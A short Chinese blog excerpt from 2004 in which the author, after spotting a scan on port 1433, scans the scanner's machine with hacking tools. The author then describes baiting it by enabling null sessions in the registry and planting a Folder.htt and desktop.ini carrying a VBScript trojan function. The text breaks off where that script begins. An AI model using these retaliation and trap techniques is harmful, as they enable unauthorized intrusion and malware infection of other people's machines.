日归档：2004 十月-9

转自<岁月联盟> 常在河边走，哪有不湿鞋，本人因为经常和一些黑友打交道，自然遭受过许多入侵，被扫描更是难免。前几天上网时，网速突然暴慢，我关了QQ和所有的网络应用软件后，右下角的网络连接图标还是闪个不停，莫非是被人扫描了？可是我没装防火墙（大家可不要学我），于是我想到了用嗅探器看看，一嗅果然嗅出了名堂，如图1。 此主题相关图片如下： 看到了吧，从XXX.XXX.XXX.99机的4854端口发送数据包到我机（xxx.xxx.xxx.58）的1433端口，又返回去，这是典型被扫描的症状。我的机子更本没有SQL-SERVER哪来的1433端口？100%是被扫了，拿到IP后，先看看是有没有跟QQ上好友是一样的，看了一下没有，不管这些先用流光判断对方的系统， 。对方是NT，那就好半了，先用x-scan扫一下。听了一首歌后发现没有弱口令，开了以下端口： 端口21开放: FTP (Control) 端口139开放: NETBIOS Session Service 端口443开放: HttpS, Secure HTTP 端口445开放: Microsoft-DS 端口3389开放: Windows 2000 remote admin 暴力破解21端口？太耗时间几率也小，139？NETBOIS？没口令一切都是空谈，3389？输入法？大海捞针。 于是我决定来此引狼入室，再来个瓮中捉鳖，其实蜜罐就是这道理。开工喽，首先先打开注册表，把空连接打开（注：把注册表里HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsarestrictanonymous REG_DWORD 0×2 改为0×0, 关闭所有共享，只把3个文件夹的共享打开，第一个文件夹里放置两个文件：Folder.htt，desktop.ini。 如图2 [.ShellClassInfo] ConfirmFileOp=0 其中关键代码为： <s cript language=vbs cript> function muma() dim … 继续阅读 →